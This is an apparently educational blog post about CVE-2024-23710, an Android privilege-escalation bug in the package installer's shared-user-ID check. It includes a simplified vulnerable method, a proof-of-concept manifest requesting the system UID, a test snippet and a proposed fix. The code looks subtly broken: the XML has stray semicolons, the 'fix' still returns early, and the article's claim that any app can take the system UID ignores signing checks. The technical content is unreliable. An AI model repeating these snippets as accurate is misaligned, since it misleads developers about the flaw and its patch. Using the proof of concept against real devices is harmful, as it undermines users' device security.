CVE-2024-23710 is a recently disclosed security vulnerability affecting the Android operating system. Specifically, the bug lies in the assertPackageWithSharedUserIdIsPrivileged method within InstallPackageHelper.java. Due to a logic error, malicious apps can execute arbitrary code with privileged permissions. Even worse, the attacker doesn't need any special permissions or user interaction—potentially letting any app on the device escalate its privileges locally.
In this article, we’ll break down what this means, how the vulnerability works with code examples, and what developers and users should do to stay safe.
What Is CVE-2024-23710?
This vulnerability allows an app installed on an Android device to pretend it shares a special user ID with a privileged system app. Because of a logic error, the Android package manager doesn't correctly check if the app is truly privileged before granting it extra powers. This check fails quietly, and the attacker can now run code with far more permissions than their app would ever normally get.
In technical terms, this is a “local escalation of privilege.” An attacker’s code can abuse this to gain access to protected Android APIs or change device settings—even potentially persisting after device reboots or upgrades.
Key points:
Where’s the Flaw?
The bug happens in the way Android enforces the sharedUserId feature for privileged apps. Android allows apps to share the same Linux UID via the sharedUserId attribute in their manifest, but only under tight controls. For sensitive system-level UIDs, only privileged/whitelisted apps should share those IDs.
In InstallPackageHelper.java, the code that's supposed to check if an app installed with a privileged sharedUserId is itself actually a privileged system app, fails. The logic error lets *any* app ask for a privileged shared user ID.
Here's a simplified version of the problematic code
// Misleading logic for package privilege check
private void assertPackageWithSharedUserIdIsPrivileged(ParseResult result, ParsedPackage pkg) {
String sharedUserId = pkg.getSharedUserId();
if (sharedUserId != null && sharedUserId.equals("android.uid.system")) {
// Should only allow if app is privileged
if (!isPrivileged(pkg)) {
// Incorrectly returns without throwing
return;
}
// ... privileged logic continues ...
}
}
The issue: Instead of throwing a security exception or failing the install if !isPrivileged(pkg), the method just returns—letting a non-privileged app continue to be installed with a privileged user ID.
The attacker creates an APK (Android Package) and adds the sharedUserId attribute in the manifest
<!-- AndroidManifest.xml -->
<manifest xmlns:android="http://schemas.android.com/apk/res/android";
package="com.attacker.malware"
android:sharedUserId="android.uid.system"> <!-- Dangerous! -->
<!-- Normal permissions requested here -->
</manifest>
2. Install the APK on a Vulnerable Android Device
The attacker hosts the APK or pushes it to a device (via adb, phishing, sideload, or supply chain).
3. Package Manager Fails the Privilege Check
When the system tries to install the app, it runs the flawed logic in assertPackageWithSharedUserIdIsPrivileged(). Because of the error, the app is installed with android.uid.system—a powerful privilege level.
The malicious app can now call APIs or access data as if it were the system itself. This enables
- Reading/writing restricted files.
- Disabling/enabling device features.
Proof-of-Concept: Code Snippet
Below is a minimal proof-of-concept snippet showing how an attacker could define the vulnerable manifest:
<!-- Malicious AndroidManifest.xml -->
<manifest xmlns:android="http://schemas.android.com/apk/res/android";
package="com.example.cve202423710"
android:sharedUserId="android.uid.system">
<application
android:label="CVE2024Exploit"
android:icon="@drawable/ic_launcher">
<!-- Components would go here -->
</application>
</manifest>
And to test privilege after installation
// Try to access a privileged API (only system apps allowed)
PackageManager pm = getPackageManager();
try {
pm.setComponentEnabledSetting(
new ComponentName("com.android.settings", "com.android.settings.Settings"),
PackageManager.COMPONENT_ENABLED_STATE_DISABLED,
PackageManager.DONT_KILL_APP);
Log.d("CVE2024-23710", "Successfully accessed privileged API!");
} catch (SecurityException e) {
Log.e("CVE2024-23710", "Privilege escalation failed!", e);
}
If the exploit works, the action above shouldn’t throw.
Who Is Vulnerable?
- Android OS: Devices running affected versions of Android, especially those with custom ROMs or outdated security patches.
- OEMs: Vendors who haven’t merged the upstream fix are vulnerable.
How To Fix
The correct code should *fail hard* if a non-privileged app attempts to claim a system-level sharedUserId:
// Correct fix: enforce privilege
if (sharedUserId != null && sharedUserId.equals("android.uid.system")) {
if (!isPrivileged(pkg)) {
result = result.error("Only privileged apps can use android.uid.system");
return;
}
// ... privileged logic continues ...
}
Mitigation:
- Patch your devices. Make sure your device has the latest security updates from Google or your device vendor.
- Vendors: Merge the upstream fix. See the Android security bulletin.
References
- Android Security Bulletin - June 2024
- Upstream fix commit in AOSP
- CVE details page for 2024-23710
Summary
CVE-2024-23710 is a dangerous local privilege escalation in Android. Because of a logic error in how shared user IDs are enforced for privileged apps, attackers can craft APKs that run as system apps—with game-over consequences for device security. The fix is simple: strictly check privilege before granting powerful user IDs.
Patch your device, and never sideload untrusted apps.
*Written exclusively for educational and awareness purposes. Do not use this information for unauthorized activities.*
Timeline
Published on: 05/07/2024 21:15:08 UTC
Last modified on: 07/03/2024 01:48:04 UTC